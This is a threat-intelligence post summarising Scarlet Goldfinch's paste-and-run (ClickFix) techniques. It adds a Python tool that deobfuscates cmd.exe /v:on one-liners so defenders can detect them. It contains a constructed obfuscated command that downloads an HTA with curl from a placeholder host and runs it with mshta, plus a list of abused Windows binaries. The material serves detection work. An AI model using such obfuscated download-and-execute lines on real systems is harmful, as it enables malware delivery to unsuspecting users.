(redcanary.com) Scarlet Goldfinch Threat Actor Evolves Paste-and-Run Techniques Across Multiple Attack Epochs
Scarlet Goldfinch (SmartApeSG/ZPHP) evolves paste-and-run TTPs across 7 epochs, leveraging T1204.004 (Malicious Copy-Paste) for initial access. Recent campaigns use cmd.exe /v:on for delayed env var expansion, ^ escape obfuscation, and substring indexing. End-stage payloads remain NetSupport Manager (via Remcos), with StealC/ArechClient2 observed. DLL sideloading chain: curl-delivered HTA → AppData\Local staging → tar extraction → legitimate EXE abuse. Defenders: signature-based detection alone is insufficient.
Source: https://redcanary.com/blog/threat-intelligence/scarlet-goldfinch-clickfix/
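Added example (not code from the Red Canary post or from the relay): the summary above names three cmd.exe tricks, /v:on delayed expansion, caret (^) escaping and !var:~start,len! substring indexing, which together let a pasted one-liner assemble "curl" and "mshta" from variables so that neither word appears literally. The script below models the subset of cmd.exe parsing those tricks rely on (phase-1 %var% expansion from the pre-existing environment, caret stripping and & splitting outside double quotes, set assignments, and per-command delayed expansion with substring slicing), resolves the commands a sample line would actually run, and extracts indicators a detection rule could key on. The SAMPLE command line, the example.invalid URL, the placeholder %LOCALAPPDATA% value and the helper names are all constructed for this example; it does not model !var:x=y! substitution, pipes or FOR loops.

```python
"""Resolve cmd.exe /v:on paste-and-run one-liners and pull detection indicators.
Example code written for this page; models a subset of cmd.exe parsing only."""
import re
from dataclasses import dataclass, field

# Constructed sample shaped like the pattern the summary describes; NOT a captured
# Scarlet Goldfinch artifact. 'set "a=curl"' is the quoted form (carets inside quotes
# are literal), the other two 'set' values hide mshta and http behind carets, and the
# final commands are stitched together from !var:~start,len! slices.
SAMPLE = (
    'cmd.exe /v:on /c "set "a=curl" & set b=m^s^h^t^a& '
    'set c=h^t^t^p://example.invalid/sg/s.hta& '
    '!a:~0,4! -s -o %LOCALAPPDATA%\\!c:~-5! !c! & '
    '!b! %LOCALAPPDATA%\\!c:~-5!"'
)
INITIAL_ENV = {"localappdata": r"C:\Users\victim\AppData\Local"}  # placeholder value

# Tools named in the chain above (curl, HTA via mshta, tar) plus other commonly abused
# Windows-native binaries; extend to taste.
LOLBINS = {"curl", "mshta", "tar", "powershell", "certutil", "bitsadmin",
           "rundll32", "regsvr32", "wscript", "cscript"}
DELAYED_REF = re.compile(r"!([^!:]+?)(?::~(-?\d+)(?:,(-?\d+))?)?!")


@dataclass
class Analysis:
    delayed_expansion: bool          # /v or /v:on present on the cmd.exe invocation
    caret_count: int                 # raw '^' count in the original line
    substring_refs: int              # number of !var:~...! slices
    resolved: list = field(default_factory=list)   # commands that would actually run
    lolbins: set = field(default_factory=set)      # first binary of each command


def cmd_substring(value: str, start: int, length):
    """cmd's !var:~start,len!: negative start counts from the end, negative len
    drops that many trailing characters, out-of-range start yields ''."""
    n = len(value)
    s = start if start >= 0 else max(n + start, 0)
    if length is None:
        return value[s:]
    e = s + length if length >= 0 else n + length
    return value[s:e] if e > s else ""


def expand_percent(line: str, env: dict) -> str:
    """Phase 1: %var% is expanded once over the whole line from the environment that
    exists before any 'set' runs; undefined names stay literal at a cmd /c prompt.
    This is exactly why the actor needs /v:on: a %var% assigned later on the same
    line can never resolve, but a !var! can."""
    return re.sub(r"%([^%\s]+)%", lambda m: env.get(m.group(1).lower(), m.group(0)), line)


def split_commands(line: str) -> list:
    """Phase 2: strip caret escapes and split on '&' / '&&'; inside double quotes
    both '^' and '&' are literal, so m^s^h^t^a becomes mshta only when unquoted."""
    parts, buf, in_quote, i = [], [], False, 0
    while i < len(line):
        ch = line[i]
        if ch == '"':
            in_quote = not in_quote
        elif not in_quote and ch == "^":
            i += 1
            if i >= len(line):
                break
            ch = line[i]
        elif not in_quote and ch == "&":
            parts.append("".join(buf))
            buf = []
            i += 2 if line.startswith("&&", i) else 1
            continue
        buf.append(ch)
        i += 1
    parts.append("".join(buf))
    return [p.lstrip() for p in parts if p.strip()]


def expand_delayed(segment: str, env: dict) -> str:
    """Delayed expansion runs per command just before it executes, so it sees
    variables assigned by earlier 'set' commands on the same line."""
    def sub(m):
        value = env.get(m.group(1).lower())
        if value is None:
            return ""                      # undefined !var! expands to nothing
        if m.group(2) is None:
            return value
        return cmd_substring(value, int(m.group(2)),
                             None if m.group(3) is None else int(m.group(3)))
    return DELAYED_REF.sub(sub, segment)


def parse_set(segment: str):
    """(name, value) for 'set name=value' or 'set "name=value"', else None."""
    m = re.match(r"(?i)set\s+(.*)$", segment, re.S)
    if not m:
        return None
    body = m.group(1)
    if body.startswith('"') and body.count('"') >= 2:
        body = body[1:body.rindex('"')]    # set keeps text between first and last quote
    name, sep, value = body.partition("=")
    return (name.lower(), value) if sep else None


def first_binary(command: str) -> str:
    m = re.match(r'\s*"?([^"\s]+)', command)
    if not m:
        return ""
    name = m.group(1).replace("\\", "/").rsplit("/", 1)[-1].lower()
    return name[:-4] if name.endswith(".exe") else name


def analyse(cmdline: str, env: dict = None) -> Analysis:
    env = dict(env or {})
    m = re.search(r"(?i)\s/c\s+(.*)\Z", cmdline, re.S)
    flags, body = (cmdline[:m.start()], m.group(1)) if m else ("", cmdline)
    delayed = re.search(r"(?i)/v(?::on)?(?=\s|/|$)", flags) is not None
    quotes = body.count('"')
    if body.startswith('"') and quotes >= 2:
        last = body.rindex('"')
        inner = body[1:last]
        # cmd /c keeps the quotes only in the narrow "two quotes, no special characters"
        # case; otherwise it strips the first and the last one (simplified rule).
        if quotes > 2 or re.search(r"[&<>()@^|]", inner):
            body = inner + body[last + 1:]
    result = Analysis(delayed, cmdline.count("^"), len(re.findall(r"![^!:]+:~", cmdline)))
    for seg in split_commands(expand_percent(body, env)):
        seg = expand_delayed(seg, env) if delayed else seg   # without /v:on, '!' is literal
        assignment = parse_set(seg)
        if assignment:
            env[assignment[0]] = assignment[1]
            continue
        seg = seg.strip()
        result.resolved.append(seg)
        if first_binary(seg) in LOLBINS:
            result.lolbins.add(first_binary(seg))
    return result


if __name__ == "__main__":
    a = analyse(SAMPLE, INITIAL_ENV)
    for c in a.resolved:
        print(c)
    print(f"delayed={a.delayed_expansion} carets={a.caret_count} "
          f"substring_refs={a.substring_refs} lolbins={sorted(a.lolbins)}")
```

Run on the sample, the resolver yields the two commands the line really executes (a curl download of s.hta into the AppData\Local placeholder, then mshta on that file) even though neither "curl" nor "mshta" appears contiguously in the pasted text, which is the point the summary makes about signature matching. The indicator counts are the cheap signals worth alerting on in process-creation telemetry: /v:on on a cmd.exe launched from explorer.exe or a browser, several carets, and any !var:~ slice; the resolved commands feed the more expensive checks (LOLBin plus an .hta URL plus a user-writable staging path).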
relay@relay.infosec.exchange shared this topic